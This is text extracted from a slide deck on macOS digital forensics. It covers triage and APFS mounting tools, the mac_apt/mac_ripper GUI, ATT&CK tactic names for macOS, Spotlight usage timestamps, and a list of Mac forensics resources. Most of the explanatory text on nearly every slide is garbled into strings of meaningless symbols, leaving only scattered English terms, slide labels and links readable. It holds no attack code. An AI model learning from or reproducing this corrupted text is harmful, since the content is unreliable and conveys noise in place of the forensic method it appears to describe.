• 0;"<S]ZF29.A$(>;+8
EDC
Mac Forensics; KY]PF3C8+,08F826+=3
ü WHKZOQTXNI9:<D4)I]TJWHMV@S]Z;YK\73
ü #%>402-+;7)I]TJWHMV?1/&2-DAD=5G
ü UJQM; :<*=BD4)WHQVWL[\PRM
B;F2=3
ü High Sierra'(APFS)F!:26+=3
INTRODUCTION
• How & What (:)@67:D;O^[C64,)
ü<>python3=YFWYZ9mac=TFPEWIX]S8&;09C0;2
ØTriage tool(Fast forensics)9Mount tool9Parse&Filter tool=3LNR
ØGUI8+$'mac_apt8*BA)GUI-;(=8'GUI-1( C
→#-;.mac_apt=parseC(0;3;( C
TRIAGE TOOL(MACOS FILE TRIAGE TOOL)
• #%7F?8B6:@5B69E)#'$3>FE
ü go(4'2.app5
$4.
standalone(
→python-Mac1"*3)!%,(
python*#(/"0+2#%
ü $3B69E-
Malware : ;9AF
Fraud :
macripper : mac_ripper
ALLList : ',CD<=@
,4&,CD<=@5&
ü ($3B69E5(
Slide 14
Slide 14 text
•
ü 07A
/
?/$8*,=
evidence8-=3!
4+>.5<)07A('
ü 8*,="2,;12@9#ctime('
(ditto0:@607A')
ü 4+>.5<"2,;12@9#btime ('
(8*,="2,;12@9#spotlight"db&%
mac_ripper)
TRIAGE TOOL(MACOS FILE TRIAGE TOOL)
Slide 15
Slide 15 text
• #()/,1 4'1(,
ü 11-(
ü ."2.2-(*$(,
ü +!3%,1
+!3%,1
ü 04&+!3%,1$USEROK
ü +!3%,1
."2
*
→/Library/LaunchAgents/*.plist
TRIAGE TOOL(MACOS FILE TRIAGE TOOL)
Slide 16
Slide 16 text
MOUNT TOOL(APFS IMAGE MOUNTER)
Slide 17
Slide 17 text
MOUNT TOOL(APFS IMAGE MOUNTER)
• .APFS-9H=@51E017EI:-05,Mac,D8H>
ü Python3.7
ü BrowseCIF"
APFS-Mac*
MAC RIPPER(GUI)
• mac_apt$*,& %(
(). !-GUI."6C@
ü Python3.7
ü !-<3=C@.
ü 'Browse:4B+'
@C870A28?.
ü 'Browse:4B+Output70A28?.
ü Rip:4B.!
ü !-%Finish%-
ü 1>C#);59/59-
Input(root)
output
Initial
Access
Execution Persistence
Privilege
Escalation
Defense
Evasion
Credential
Access
Discovery
Lateral
Movement
Collection
Command
and
Control
Exfiltration Impact
ATT&CK#%MACOS
% "!
• ATT&CK %$macOS
Slide 26
Slide 26 text
Initial
Access
Execution
Persistenc
e
Privilege
Escalation
Defense
Evasion
Credentia
l Access
Discovery
Lateral
Movemen
t
Collectio
n
Comman
d and
Control
Exfiltration Impact
ATT&CK*+&MACOS #+'$)"%(!
•
macOS
• Spotlight.db"2kMDItemLastUsedDateE>5)A68J5&
ü
.5 kMDItemLastUsedDate"2
→mac_ripper(spotlight(last_used) module).output(csv)/
$4'A68JM?7K:@I
EXECUTION(SPOTLIGHTE>)
A68J.;FLJ
app
ü kMDItemLastUsedDate+=N@
ü safari+zip5,%*#*
ü zip5%*
ü 8L<@NH5(BIGNDC9L@)%*
ü app5
, !1!-
*5(*50243
(/)
MAC3.5602/,*
• Windows#+#
%
ü Windows+#3.5602/ +
%
ü )*&)*% +7 T2124#
ü Mac7 $ UNIX"(7 !'-…
Slide 64
Slide 64 text
• Mac4n6
ü Sarah Edwards (@iamevltwin) → https://www.mac4n6.com/
ü Yogesh Khatri (@SwiftForensics) → https://www.swiftforensics.com/
ü Mac4n6(Macadmins) → https://github.com/pstirparo/mac4n6
ü Obejective-see → https://objective-see.com/index.html
ü Blackbag blog → https://www.blackbagtech.com/index.php/blog
ü SentinelOne → https://www.sentinelone.com/blog/
ü Focus Systems(
) → https://cyberforensic.focus-
s.com/knowledge/articles_detail/
ü → https://github.com/slo-sleuth/slo-
sleuth.github.io/blob/master/Apple/APFS%20Imaging.md
MAC
Slide 65
Slide 65 text
MAC(+, "#.*
• Free
tool
ü Mac-apt(https://github.com/ydkhatri/mac_apt)
ü
.$(%'.!#.*
-
#.*
ü Black Light
ü RECON LAB
ü AXIOM
- !?
üMac),&